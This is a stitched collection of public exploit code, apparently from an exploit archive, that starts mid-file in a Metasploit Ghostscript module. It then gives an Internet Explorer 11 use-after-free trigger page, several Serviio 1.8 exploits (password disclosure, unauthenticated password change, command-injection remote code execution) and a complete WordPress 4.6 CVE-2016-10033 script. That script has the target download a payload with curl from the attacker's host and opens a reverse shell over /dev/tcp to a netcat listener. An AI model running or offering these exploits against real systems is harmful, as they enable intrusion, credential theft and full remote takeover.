# $ gs -q -dNOPAUSE -dSAFER -sDEVICE=ppmraw -sOutputFile=/dev/null -f exploit2.eps
def exploit
file_create(template.sub('echo vulnerable > /dev/tty', payload.encoded))
end
def template
::File.read(File.join(
Msf::Config.data_directory, 'exploits', 'CVE-2017-8291',
target[:template]
))
end
end
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="Expires" content="0" />
<meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" />
<meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" />
<meta http-equiv="Pragma" content="no-cache" />
<style type="text/css">
body{
background-color:black;
font-color:red;
};
</style>
<script type='text/javascript'></script>
<script type="text/javascript" language="JavaScript">
/********************************
* Exploit Title: Internet Explorer 11 CMarkup::DestroySplayTree Use-After-Free
* Google Dork: n/a
* Date: 03.05.2017
* Exploit Author: Marcin Ressel
* TT: @r_esselm
* Vendor Homepage: www.microsoft.com
* Software Link: n/a
* Version: 11.0.9600.18638
* Tested on: Windows 7
* CVE : n/a
* ****************************
(151c.10a4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0cf14bd0 ecx=70062370 edx=00000000 esi=1195cfa0 edi=11abcfa0
eip=706af750 esp=09a5b240 ebp=09a5b3a4 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
MSHTML!`CBackgroundInfo::Property<CBackgroundImage>'::`7'::`dynamic atexit destructor for 'fieldDefaultValue''+0x15ae0c:
706af750 ff36 push dword ptr [esi] ds:002b:1195cfa0=????????
0:007> !heap -p -a @esi
address 1195cfa0 found in
_DPH_HEAP_ROOT @ 9f61000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
ef4230c: 1195c000 2000
743990b2 verifier!AVrfDebugPageHeapFree+0x000000c2
76f9170c ntdll!RtlDebugFreeHeap+0x0000002f
76f4a863 ntdll!RtlpFreeHeap+0x0000005d
76ef2bd5 ntdll!RtlFreeHeap+0x00000142
769c14ad kernel32!HeapFree+0x00000014
707ad096 MSHTML!MemoryProtection::HeapFree+0x00000046
6ff25102 MSHTML!CMarkup::DestroySplayTree+0x00000223
7000ca27 MSHTML!CMarkup::UnloadContents+0x000003c3
702b64b9 MSHTML!CMarkup::TearDownMarkupHelper+0x000000b2
702b63e0 MSHTML!CMarkup::TearDownMarkup+0x00000058
700c55a6 MSHTML!CFrameContentHelper::TearDownFrameContent+0x00000180
700c5484 MSHTML!CFrameSite::Passivate+0x00000024
6ff15107 MSHTML!CBase::PrivateRelease+0x000000c1
6fefe10e MSHTML!CElement::PrivateRelease+0x0000001a
705517cb MSHTML!CBase::JSBind_Release+0x00000050
6eed3de3 jscript9!Js::CustomExternalObject::Dispose+0x00000023
6eed3dac jscript9!SmallFinalizableHeapBlock::DisposeObjects+0x0000011e
6eed4fb0 jscript9!HeapInfo::DisposeObjects+0x000000a9
6eed4e80 jscript9!Recycler::DisposeObjects+0x0000004a
6f048af0 jscript9!ThreadContext::DisposeObjects+0x00000072
6f11b6b6 jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+0x0003acdb
6eec259a jscript9!HeapBucketT<SmallFinalizableHeapBlock>::SnailAlloc+0x0000003e
6eec2609 jscript9!Recycler::AllocFinalized+0x000000ac
6eec318f jscript9!ScriptEngineBase::CreateTypedObjectFromScript+0x00000055
6eec312a jscript9!ScriptEngineBase::CreateTypedObject+0x0000006a
6ff28509 MSHTML!CJScript9Holder::CBaseToVar+0x00000120
709202cc MSHTML!CRegisteredMutationObserver::CreateTransientCopy+0x0000001b
7091ff2a MSHTML!CDOMNode::AppendTransientRegisteredObservers+0x000000e3
706af72d MSHTML!`CBackgroundInfo::Property<CBackgroundImage>'::`7'::`dynamic atexit destructor for 'fieldDefaultValue''+0x0015ade9
7005f500 MSHTML!CSpliceTreeEngine::RemoveSplice+0x00004af6
70063a2e MSHTML!CMarkup::SpliceTreeInternal+0x000000a8
7052ee3f MSHTML!CDoc::CutCopyMove+0x00000d93
*
*/
var ref = [];
var doc = null;
var dom = null;
var trg = null;
var trg_parent = null;
var text_r = null;
var select_o = null;
function handle() {
try{doc.getElementsByTagName("*")[3].appendChild(document.createElement("td"));}catch(e){}
try{var tmp0=doc.getElementsByTagName("*")[3].removeNode(false).appendChild(document.createElement("button")).removeNode(true);rem.push(tmp0);}catch(e){}
try{document.body.innerHTML = "<td>1073741823<td><p><html><div><command><command><marque><td><marque><command><div><table><td><iframe>/>195936478<select><marque><rp><canvas>4278124286/><li>0/><x>4278124286/><canvas><p>/><li>/>65537<tr><command>4294967295<x><select><object>655364042322160<li>/>254<style>/></style></li><canvas><tr><th><li>65537/></li></th></tr></canvas></x>-127<html></html></tr>4042322160<div>/><marque><x>2<table>/>0</table></x></marque>52<canvas>2<li>3503345872/>65535</li></canvas>195936478<table><marque><p><table>/>1.9999999999999<style>4<style>239</style></style></table></p></marque></table>/>1094795585<html>4096<table></table></html><canvas><select></select></canvas></iframe>/>255<style><select>1024/><th>65537<canvas><p>2</p></canvas></th></select></style></div>3/>/><marque>4042322160/></marque>/>2147483646<table><marque><p><tr>/>65537/></tr></p></marque></table>1094795585/>/>65535<select><command>4096/>65537<canvas></canvas></command></select><li>255<select><table></table></select></li><tr>/><marque>1.9999999999999/>-127</marque></tr></command><table>4278124286<ol>-127<iframe><tr>1024</tr></iframe></ol></table></html><select>4294967294<marque><body>0<td><marque>1048576</marque></td></body></marque></select></td>";}catch(e){}
try{doc.execCommand("justifyCenter",false,"NULL");}catch(e){}
try{select_o.selectAllChildren(ref[1], 0);}catch(e){}
try{text_r.select();}catch(e){}
try{tree_r.setEnd(ref[0],0);}catch(e){}
try{select_o.selectAllChildren(doc.body);}catch(e){}
try{tree_r.surroundContents(ref[0]);}catch(e){}
try{text_r.pasteHTML("<svg viewBox=127 2147483647 255 5 xmlns=http://www.w3.org/2000/svg xmlns=about:blank><feGaussianBlur in=SourceGraphic /> </svg>");}catch(e){}
try{tree_r.selectNodeContents(document.body);}catch(e){}
try{trg_parent.innerHTML = trg.innerHTML;}catch(e){}
}
function testcase() {
var e1f = document.getElementById("e1");
doc = document.getElementById("t1").contentWindow.document;
e = e1f.contentWindow.document.createElement("ins");
e.cite = 'about:blank';
rf = doc.body.appendChild(e);
ref.push(rf);
e = e1f.contentWindow.document.createElement("iframe");
rf = doc.body.appendChild(e);
ref.push(rf);
dom = doc.getElementsByTagName("*");
trg = dom[3];
trg_parent = doc.body;
text_r = doc.body.createTextRange();
tree_r = doc.createRange();
tree_r.setStart(trg,0);
tree_r.setEnd(trg,0);
select_o = window.getSelection();
var ob = new MutationObserver(handle);
ob.observe(doc,{ attributes: true, childList: true, characterData: true, subtree: true });
try {
trg.insertBefore(document.createElement("div"),ref[1]);
} catch(e) {}
doc.adoptNode(trg.attributes[0]);
trg.appendChild(document.createElement("animateTransform")).removeNode(false).innnerText = "À";
tmp = trg;
}
</script>
<title>IE11 MSHTML!CMarkup::DestroySplayTree Use-After-Free</title>
</head>
<body onload='testcase();'>
<iframe src='about:blank' id='t1' width="100%"></iframe><iframe width="100%" src='about:blank' id='e1'></iframe>
</body>
</html>
#!/usr/bin/env python
#
#
# Serviio PRO 1.8 DLNA Media Streaming Server REST API Information Disclosure
#
#
# Vendor: Petr Nejedly | Six Lines Ltd
# Product web page: http://www.serviio.org
# Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1
#
# Summary: Serviio is a free media server. It allows you to stream your media
# files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
# games console or mobile phone) on your connected home network.
#
# Vendor:
# "Security:
# MediaBrowser (as well as any app that uses the API) uses well proven security techniques,
# so that you can be sure your content is only accessed by you. Make sure you keep your password
# secure."
#
# Desc: The version of Serviio installed on the remote Windows/Linux host is affected
# by an information disclosure vulnerability due to improper access control enforcement
# of the Configuration REST API. An unauthenticated, remote attacker can exploit this,
# via a specially crafted request, to gain access to potentially sensitive information.
#
# Tested on: Restlet-Framework/2.2
# Windows 7, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
# Mac OS X, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
# Linux, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2017-5404
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5404.php
#
# SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094
#
#
# 12.12.2016
#
import sys
import xml.etree.ElementTree as ET
from urllib2 import Request, urlopen
if (len(sys.argv) <= 2):
print '[*] Usage: serviio_id.py <ip address> <port>'
print '[*] Example: serviio_id.py 10.211.55.3 23423'
exit(0)
host = sys.argv[1]
port = sys.argv[2]
headers = {'Accept': 'application/xml'}
request = Request('http://'+host+':'+port+'/rest/import-export/online', headers=headers)
print '\nPrinting ServiioLinks:'
print '----------------------\n'
response_body = urlopen(request).read()
roottree = ET.fromstring(response_body)
for URLs in roottree.iter('serviioLink'):
print URLs.text
print
headers = {'Accept': 'application/xml'}
#request = Request('http://'+host+':'+port+'/rest/list-folders?directory=C:\\', headers=headers)
request = Request('http://'+host+':'+port+'/rest/list-folders?directory=/etc', headers=headers)
print '\nPrinting directories:'
print '---------------------\n'
response_body = urlopen(request).read()
roottree = ET.fromstring(response_body)
for URLs in roottree.iter('path'):
print URLs.text
print
headers = {'Accept': 'application/xml'}
request = Request('http://'+host+':'+port+'/rest/remote-access', headers=headers)
print '\nPrinting mediabrowser password:'
print '-------------------------------\n'
response_body = urlopen(request).read()
roottree = ET.fromstring(response_body)
for URLs in roottree.iter('remoteUserPassword'):
print URLs.text
print
'''
rewt@zslab:~# python serviio_id.py 10.211.55.3 23423
Printing ServiioLinks:
----------------------
serviio://video:feed?url=http%3A%2F%2FRSSEXAMPLEURL%2Fzsl.xml
serviio://video:live?url=http%3A%2F%2FLIVESTREAMEXAMPLE%2Fzsl
serviio://video:web?url=http%3A%2F%2FWEBRESOURCEEXAMPLE%2Fzsl.resource
Printing directories:
---------------------
/etc/apache2
/etc/asl
/etc/cups
/etc/defaults
/etc/emond.d
/etc/mach_init.d
/etc/mach_init_per_login_session.d
/etc/mach_init_per_user.d
/etc/manpaths.d
/etc/newsyslog.d
/etc/openldap
/etc/pam.d
/etc/paths.d
/etc/periodic
/etc/pf.anchors
/etc/postfix
/etc/ppp
/etc/racoon
/etc/security
/etc/snmp
/etc/ssh
/etc/ssl
/etc/sudoers.d
Printing mediabrowser password:
-------------------------------
s3cr3to
rewt@zslab:~#
'''
Serviio PRO 1.8 DLNA Media Streaming Server Local Privilege Escalation
Vendor: Petr Nejedly | Six Lines Ltd
Product web page: http://www.serviio.org
Affected version: 1.8.0.0 PRO
Summary: Serviio is a free media server. It allows you to stream your media
files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
games console or mobile phone) on your connected home network.
Desc: The application suffers from an unquoted search path issue impacting the service
'Serviio' for Windows deployed as part of Serviio DLNA server solution. This could potentially
allow an authorized but non-privileged local user to execute arbitrary code with elevated
privileges on the system. A successful attempt would require the local user to be able to
insert their code in the system root path undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot. If successful, the
local user’s code would execute with the elevated privileges of the application.
Serviio also suffers from improper permissions which can be used by a simple authenticated user
that can change the executable file with a binary of choice. The vulnerability exist due to the
improper permissions, with the 'F' flag (Full) for 'Users' group, for the Serviio directory and
its sub-directories.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5405
Advisory URL: http://www.zeroscience.mk/en/vulnerability/ZSL-2017-5405.php
SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094
12.12.2016
---
C:\>sc qc Serviio
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Serviio
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Serviio\bin\ServiioService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Serviio
DEPENDENCIES : HTTP
SERVICE_START_NAME : LocalSystem
C:\>icacls "C:\Program Files\Serviio\bin\ServiioService.exe"
C:\Program Files\Serviio\bin\ServiioService.exe BUILTIN\Users:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
Successfully processed 1 files; Failed processing 0 files
C:\>
#!/usr/bin/env python
#
#
# Serviio PRO 1.8 DLNA Media Streaming Server REST API Arbitrary Password Change
#
#
# Vendor: Petr Nejedly | Six Lines Ltd
# Product web page: http://www.serviio.org
# Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1
#
# Summary: Serviio is a free media server. It allows you to stream your media
# files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
# games console or mobile phone) on your connected home network.
#
# Desc: The version of Serviio installed on the remote Windows/Linux host is affected
# by an unauthenticated password modification vulnerability due to improper access
# control enforcement of the Configuration REST API. A remote attacker can exploit this,
# via a specially crafted request, to change the login password for the mediabrowser protected
# page.
#
# Tested on: Restlet-Framework/2.2
# Windows 7, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
# Mac OS X, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
# Linux, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2017-5407
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5407.php
#
# SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094
#
#
# 12.12.2016
#
import sys
import xml.etree.ElementTree as ET
from urllib2 import Request, urlopen
if (len(sys.argv) <= 3):
print '[*] Usage: serviio_pwd.py <ipaddress> <port> <newpassword>'
print '[*] Example: serviio_pwd.py 10.211.55.3 23423 eagle20fox2'
exit(0)
host = sys.argv[1]
port = sys.argv[2] #default port for console is 23423, and for the mediabrowser is 23424.
lozi = sys.argv[3]
values = """
<remoteAccess>
<remoteUserPassword>{0}</remoteUserPassword>
<preferredRemoteDeliveryQuality>ORIGINAL</preferredRemoteDeliveryQuality>
<portMappingEnabled>true</portMappingEnabled>
<externalAddress>myserviio.dyndns.com</externalAddress>
</remoteAccess>"""
put = values.format(lozi)
headers = {
'Content-Type': 'application/xml',
'Accept': 'application/xml'
}
request = Request('http://'+host+':'+port+'/rest/remote-access', data=put, headers=headers)
request.get_method = lambda: 'PUT'
response_body = urlopen(request).read()
roottree = ET.fromstring(response_body)
for errorcode in roottree.iter('errorCode'):
print "\nReceived error code: "+errorcode.text
print 'Password successfully changed to: '+lozi
print 'Go to: http://'+host+':23424/mediabrowser\n'
#!/usr/bin/env python
#
#
# Serviio PRO 1.8 DLNA Media Streaming Server REST API Arbitrary Code Execution
#
#
# Vendor: Petr Nejedly | Six Lines Ltd
# Product web page: http://www.serviio.org
# Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1
#
# Summary: Serviio is a free media server. It allows you to stream your media
# files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
# games console or mobile phone) on your connected home network.
#
# Desc: The version of Serviio installed on the remote Windows host is affected by
# an unauthenticated remote code execution vulnerability due to improper access control
# enforcement of the Configuration REST API and unsanitized input when FFMPEGWrapper
# calls cmd.exe to execute system commands. A remote attacker can exploit this with a
# simple JSON request, gaining system access with SYSTEM privileges via a specially
# crafted request and escape sequence.
#
# =================================================================================
# org/serviio/ui/resources/server/ActionsServerResource.java:
# -----------------------------------------------------------
#
# private ResultRepresentation checkStreamUrl(ActionRepresentation representation) {
# this.validateParameters(representation, 2);
# try {
# MediaFileType fileType = MediaFileType.valueOf(representation.getParameters().get(0));
# String url = StringUtils.trim(representation.getParameters().get(1));
# LocalItemMetadata md = MetadataFactory.getMetadataInstance(fileType);
# DeliveryContext context = fileType == MediaFileType.VIDEO ? new VideoDeliveryContext(false, null) : new AudioDeliveryContext(false, null);
# FFmpegMetadataRetriever.retrieveOnlineMetadata(md, url, context);
# return this.responseOk();
# }
# catch (InvalidMediaFormatException e) {
# return this.responseOk(603);
# }
#
# =================================================================================
# serviio.jar / external / ProcessExecutor.java:
# ----------------------------------------------
#
# private Map<String, String> createWindowsRuntimeEnvironmentVariables() {
# HashMap<String, String> newEnv = new HashMap<String, String>();
# newEnv.putAll(System.getenv());
# ProcessExecutorParameter[] i18n = new ProcessExecutorParameter[this.commandArguments.length + 2];
# i18n[0] = new ProcessExecutorParameter("cmd");
# i18n[1] = new ProcessExecutorParameter("/C");
# for (int counter = 0; counter < this.commandArguments.length; ++counter) {
# ProcessExecutorParameter argument = this.commandArguments[counter];
# String envName = "JENV_" + counter;
# i18n[counter + 2] = new ProcessExecutorParameter("%" + envName + "%");
# boolean quotesNeededForWindows = this.quotesNeededForWindows(argument);
# if (!quotesNeededForWindows) {
# argument = new ProcessExecutorParameter(this.escapeAmpersandForWindows(argument.getValue()));
# }
# newEnv.put(envName, this.wrapInQuotes(argument, quotesNeededForWindows));
# }
# this.commandArguments = i18n;
# String[] tempPath = FileUtils.splitFilePathToDriveAndRest(System.getProperty("java.io.tmpdir"));
# newEnv.put("HOMEDRIVE", tempPath[0]);
# newEnv.put("HOMEPATH", tempPath[1]);
# newEnv.putAll(this.createFontConfigRuntimeEnvironmentVariables());
# if (log.isTraceEnabled()) {
# log.trace(String.format("Env variables: %s", newEnv.toString()));
# }
# return newEnv;
# }
#
# private String wrapInQuotes(ProcessExecutorParameter argument, boolean quotesNeeded) {
# return (quotesNeeded ? "\"" : "") + argument + (quotesNeeded ? "\"" : "");
# }
#
# protected boolean quotesNeededForWindows(ProcessExecutorParameter argument) {
# boolean quotesNeeded = argument.getValue().indexOf(" ") > -1;
# return quotesNeeded;
# }
#
# private String escapeAmpersandForWindows(String value) {
# return value.replaceAll("&", "^&");
# }
#
# =================================================================================
#
# Tested on: Restlet-Framework/2.2
# Windows 7, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
# Java/1.8.0_121
# Java/1.8.0_111
# Java/1.8.0_91
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2017-5408
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5408.php
#
# SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094
#
#
# 12.12.2016
#
#
# The PoC will create a file testingus3.txt in 'C:\Program Files\Serviio\bin' with whoami
# output in it and start a calc.exe child process as nt authority\system.
#
from urllib2 import Request, urlopen
import sys
if (len(sys.argv) <= 1):
print '[*] Usage: serviio_rce.py <ip address>'
exit(0)
host = sys.argv[1]
values = """
<action>
<name>checkStreamUrl</name>
<parameter>VIDEO</parameter>
<parameter>1.2.3.4'\"`&whoami >testingus3.txt&&calc&`'</parameter>
</action>"""
headers = {
'Content-Type': 'application/xml',
'Accept': 'application/xml'
}
request = Request('http://'+host+':23423/rest/action', data=values, headers=headers)
response_body = urlopen(request).read()
print response_body
'''
Raw request:
POST /rest/action HTTP/1.1
Host: 10.211.55.3:23423
Content-Length: 93
Accept: application/json, text/plain, */*
Origin: http://10.211.55.3:23423
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36
Content-Type: application/json;charset=UTF-8
Referer: http://10.211.55.3:23423/console/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
DNT: 1
Connection: close
{"name":"checkStreamUrl","parameter":["VIDEO","1.2.3.4'\"`&whoami >testingus3.txt&&calc&`'"]}
'''
#!/bin/bash
#
# __ __ __ __ __
# / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________
# / / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
# / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ )
# /_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/
# /____/
#
#
# WordPress 4.6 - Remote Code Execution (RCE) PoC Exploit
# CVE-2016-10033
#
# wordpress-rce-exploit.sh (ver. 1.0)
#
#
# Discovered and coded by
#
# Dawid Golunski (@dawid_golunski)
# https://legalhackers.com
#
# ExploitBox project:
# https://ExploitBox.io
#
# Full advisory URL:
# https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
#
# Exploit src URL:
# https://exploitbox.io/exploit/wordpress-rce-exploit.sh
#
#
# Tested on WordPress 4.6:
# https://github.com/WordPress/WordPress/archive/4.6.zip
#
# Usage:
# ./wordpress-rce-exploit.sh target-wordpress-url
#
#
# Disclaimer:
# For testing purposes only
#
#
# -----------------------------------------------------------------
#
# Interested in vulns/exploitation?
#
#
# .;lc'
# .,cdkkOOOko;.
# .,lxxkkkkOOOO000Ol'
# .':oxxxxxkkkkOOOO0000KK0x:'
# .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.
# ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl.
# '';ldxxxxxdc,. ,oOXXXNNNXd;,.
# .ddc;,,:c;. ,c: .cxxc:;:ox:
# .dxxxxo, ., ,kMMM0:. ., .lxxxxx:
# .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx:
# .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx:
# .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx:
# .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx:
# .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx:
# .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx:
# .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx:
# .dxxxxxdl;. ., .. .;cdxxxxxx:
# .dxxxxxxxxxdc,. 'cdkkxxxxxxxx:
# .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,.
# .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.
# .':oxxxxxxxxx.ckkkkkkkkxl,.
# .,cdxxxxx.ckkkkkxc.
# .':odx.ckxl,.
# .,.'.
#
# https://ExploitBox.io
#
# https://twitter.com/Exploit_Box
#
# -----------------------------------------------------------------
rev_host="192.168.57.1"
function prep_host_header() {
cmd="$1"
rce_cmd="\${run{$cmd}}";
# replace / with ${substr{0}{1}{$spool_directory}}
#sed 's^/^${substr{0}{1}{$spool_directory}}^g'
rce_cmd="`echo $rce_cmd | sed 's^/^\${substr{0}{1}{\$spool_directory}}^g'`"
# replace ' ' (space) with
#sed 's^ ^${substr{10}{1}{$tod_log}}$^g'
rce_cmd="`echo $rce_cmd | sed 's^ ^\${substr{10}{1}{\$tod_log}}^g'`"
#return "target(any -froot@localhost -be $rce_cmd null)"
host_header="target(any -froot@localhost -be $rce_cmd null)"
return 0
}
#cat exploitbox.ans
intro="
DQobWzBtIBtbMjFDG1sxOzM0bSAgICAuO2xjJw0KG1swbSAbWzIxQxtbMTszNG0uLGNka2tPT09r
bzsuDQobWzBtICAgX19fX19fXxtbOEMbWzE7MzRtLiwgG1swbV9fX19fX19fG1s1Q19fX19fX19f
G1s2Q19fX19fX18NCiAgIFwgIF9fXy9fIF9fX18gG1sxOzM0bScbWzBtX19fXBtbNkMvX19fX19c
G1s2Q19fX19fX19cXyAgIF8vXw0KICAgLyAgXy8gICBcXCAgIFwvICAgLyAgIF9fLxtbNUMvLyAg
IHwgIFxfX19fXy8vG1s3Q1wNCiAgL19fX19fX19fXz4+G1s2QzwgX18vICAvICAgIC8tXCBfX19f
IC8bWzVDXCBfX19fX19fLw0KIBtbMTFDPF9fXy9cX19fPiAgICAvX19fX19fX18vICAgIC9fX19f
X19fPg0KIBtbNkMbWzE7MzRtLmRkYzssLDpjOy4bWzlDG1swbSxjOhtbOUMbWzM0bS5jeHhjOjs6
b3g6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eG8sG1s1QxtbMG0uLCAgICxrTU1NMDouICAuLBtb
NUMbWzM0bS5seHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1QxtbMG1sVy4gb01N
TU1NTU1LICBkMBtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1
QxtbMG0uMGsuLEtXTU1NV05vIDpYOhtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDLhtbMTsz
NG1keHh4eHhjG1s2QxtbMG0ueE4weHh4eHh4eGtYSywbWzZDG1szNG0ueHh4eHh4Og0KG1szN20g
G1s2Qy4bWzE7MzRtZHh4eHh4YyAgICAbWzBtbGRkT01NTU1XZDBNTU1NS2RkZC4gICAbWzM0bS54
eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s2QxtbMG0uY05NTU1OLm9NTU1NeCcb
WzZDG1szNG0ueHh4eHh4Og0KG1szN20gG1s2QxtbMTszNG0uZHh4eHh4YxtbNUMbWzBtbEtvO2RO
TU4ub01NMDs6T2suICAgIBtbMzRtJ3h4eHh4eDoNChtbMzdtIBtbNkMbWzE7MzRtLmR4eHh4eGMg
ICAgG1swbTtNYyAgIC5seC46bywgICAgS2wgICAgG1szNG0neHh4eHh4Og0KG1szN20gG1s2Qxtb
MTszNG0uZHh4eHh4ZGw7LiAuLBtbMTVDG1swOzM0bS4uIC47Y2R4eHh4eHg6DQobWzM3bSAbWzZD
G1sxOzM0bS5keHh4eCAbWzBtX19fX19fX18bWzEwQ19fX18gIF9fX19fIBtbMzRteHh4eHg6DQob
WzM3bSAbWzdDG1sxOzM0bS4nOm94IBtbMG1cG1s2Qy9fIF9fX19fX19fXCAgIFwvICAgIC8gG1sz
NG14eGMsLg0KG1szN20gG1sxMUMbWzE7MzRtLiAbWzBtLxtbNUMvICBcXBtbOEM+G1s3QzwgIBtb
MzRteCwNChtbMzdtIBtbMTJDLxtbMTBDLyAgIHwgICAvICAgL1wgICAgXA0KIBtbMTJDXF9fX19f
X19fXzxfX19fX19fPF9fX18+IFxfX19fPg0KIBtbMjFDG1sxOzM0bS4nOm9keC4bWzA7MzRtY2t4
bCwuDQobWzM3bSAbWzI1QxtbMTszNG0uLC4bWzA7MzRtJy4NChtbMzdtIA0K"
intro2="
ICAgICAgICAgICAgICAgICAgIBtbNDRtfCBFeHBsb2l0Qm94LmlvIHwbWzBtCgobWzk0bSsgLS09
fBtbMG0gG1s5MW1Xb3JkcHJlc3MgQ29yZSAtIFVuYXV0aGVudGljYXRlZCBSQ0UgRXhwbG9pdBtb
MG0gIBtbOTRtfBtbMG0KG1s5NG0rIC0tPXwbWzBtICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBtChtbOTRtKyAtLT18G1swbSAgICAgICAgICBE
aXNjb3ZlcmVkICYgQ29kZWQgQnkgICAgICAgICAgICAgICAgG1s5NG18G1swbQobWzk0bSsgLS09
fBtbMG0gICAgICAgICAgICAgICAbWzk0bURhd2lkIEdvbHVuc2tpG1swbSAgICAgICAgICAgICAg
ICAgIBtbOTRtfBtbMG0gChtbOTRtKyAtLT18G1swbSAgICAgICAgIBtbOTRtaHR0cHM6Ly9sZWdh
bGhhY2tlcnMuY29tG1swbSAgICAgICAgICAgICAgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBt
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBt
ChtbOTRtKyAtLT18G1swbSAiV2l0aCBHcmVhdCBQb3dlciBDb21lcyBHcmVhdCBSZXNwb25zaWJp
bGl0eSIgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBtICAgICAgICAqIEZvciB0ZXN0aW5nIHB1
cnBvc2VzIG9ubHkgKiAgICAgICAgICAbWzk0bXwbWzBtIAoKCg=="
echo "$intro" | base64 -d
echo "$intro2" | base64 -d
if [ "$#" -ne 1 ]; then
echo -e "Usage:\n$0 target-wordpress-url\n"
exit 1
fi
target="$1"
echo -ne "\e[91m[*]\033[0m"
read -p " Sure you want to get a shell on the target '$target' ? [y/N] " choice
echo
if [ "$choice" == "y" ]; then
echo -e "\e[92m[*]\033[0m Guess I can't argue with that... Let's get started...\n"
echo -e "\e[92m[+]\033[0m Connected to the target"
# Serve payload/bash script on :80
RCE_exec_cmd="(sleep 3s && nohup bash -i >/dev/tcp/$rev_host/1337 0<&1 2>&1) &"
echo "$RCE_exec_cmd" > rce.txt
python -mSimpleHTTPServer 80 2>/dev/null >&2 &
hpid=$!
# Save payload on the target in /tmp/rce
cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"
prep_host_header "$cmd"
curl -H"Host: $host_header" -s -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword
echo -e "\n\e[92m[+]\e[0m Payload sent successfully"
# Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce
cmd="/bin/bash /tmp/rce"
prep_host_header "$cmd"
curl -H"Host: $host_header" -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword &
echo -e "\n\e[92m[+]\033[0m Payload executed!"
echo -e "\n\e[92m[*]\033[0m Waiting for the target to send us a \e[94mreverse shell\e[0m...\n"
nc -vv -l 1337
echo
else
echo -e "\e[92m[+]\033[0m Responsible choice ;) Exiting.\n"
exit 0
fi
